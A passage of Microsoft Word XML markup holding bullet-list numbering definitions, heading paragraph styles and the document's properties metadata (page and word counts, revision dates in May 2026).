      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="836A0F3C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F0DE323E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A401408"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A466DBC"/>
    <w:lvl w:ilvl="0" w:tplc="3DDEFD46">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="02A0FE3C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="CEC27916">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D5E4145E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="AF68BBAE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="724EA1D2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="75B65358">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="EF681DB8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7122952A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="2144031133">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="21123162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79F"/>
    <w:rsid w:val="0019479F"/>
    <w:rsid w:val="00377C4B"/>
    <w:rsid w:val="0058385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3ABF6"/>
  <w15:docId w15:val="{A3A7F9D9-2A11-4DE5-A67F-1DC724FD6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160"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="280" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="220" w:after="100"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="180" w:after="80"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>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344</Pages>
  <Words>130410</Words>
  <Characters>743343</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>6194</Lines>
  <Paragraphs>1744</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>872009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Volkhin</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-24T16:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-26T00:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>